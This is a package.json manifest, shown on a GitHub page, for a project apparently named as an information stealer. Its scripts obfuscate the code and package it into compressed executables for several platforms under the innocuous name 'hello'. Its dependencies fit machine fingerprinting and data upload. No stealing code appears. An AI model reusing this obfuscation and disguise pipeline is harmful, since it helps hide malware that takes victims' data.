-
Notifications
You must be signed in to change notification settings - Fork 6
/
package.json
executable file
·34 lines (34 loc) · 1.09 KB
/
package.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
{
"name": "waifu-stealer",
"private": true,
"main": "index.js",
"bin": "index.js",
"scripts": {
"start": "node index.js",
"build": "node builder.js",
"pkg-windows": "pkg --targets node18-win-x64 --compress GZip --output hello.exe obfuscated/package.json",
"pkg-linux": "pkg --targets node18-linux-x64 --compress GZip --output hello obfuscated/package.json",
"pkg-linux-arm": "pkg --targets node18-linux-arm64 --compress GZip --output hello obfuscated/package.json",
"pkg-macos": "pkg --targets node18-macos-x64 --compress GZip --output hello obfuscated/package.json",
"pkg-macos-arm": "pkg --targets node18-macos-arm64 --compress GZip --output hello obfuscated/package.json"
},
"dependencies": {
"form-data": "^4.0.0",
"is-wsl": "^2.2.0",
"node-fetch": "^2.6.7",
"node-machine-id": "^1.1.12"
},
"devDependencies": {
"esbuild": "^0.14.53",
"fs-extra": "^10.1.0",
"javascript-obfuscator": "^4.0.0",
"minimist": "^1.2.6"
},
"workspaces": [
"plugins/*"
],
"pkg": {
"scripts": "plugins/**/lib.js",
"assets": "build/*"
}
}